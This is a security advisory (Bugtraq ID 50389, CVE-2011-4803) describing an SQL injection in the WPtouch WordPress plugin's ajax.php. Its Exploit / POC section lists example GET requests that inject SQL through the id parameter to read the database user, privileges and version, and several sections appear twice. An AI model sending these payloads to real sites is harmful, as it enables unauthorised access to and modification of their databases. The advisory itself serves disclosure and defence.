WordPress WPtouch Plugin 'ajax.php' SQL Injection Vulnerability
BID:50389
Info
WordPress WPtouch Plugin 'ajax.php' SQL Injection Vulnerability
| Bugtraq ID: | 50389 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-4803 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 27 2011 12:00AM |
| Updated: | Dec 15 2011 07:38PM |
| Credit: | longrifle0x |
| Vulnerable: |
WordPress WPtouch 0 |
| Not Vulnerable: | |
Discussion
WordPress WPtouch Plugin 'ajax.php' SQL Injection Vulnerability
WPtouch plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WPtouch plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
WordPress WPtouch Plugin 'ajax.php' SQL Injection Vulnerability
Attacker can exploit this issue with a browser.
The following example URLs are available:
http://www.example.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()
http://www.example.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://www.example.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)
Attacker can exploit this issue with a browser.
The following example URLs are available:
http://www.example.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()
http://www.example.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://www.example.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)
Solution / Fix
WordPress WPtouch Plugin 'ajax.php' SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
WordPress WPtouch Plugin 'ajax.php' SQL Injection Vulnerability
References:
References:
- Wordpress Homepage (Wordpress)
- WPtouch Homepage (Wordpress)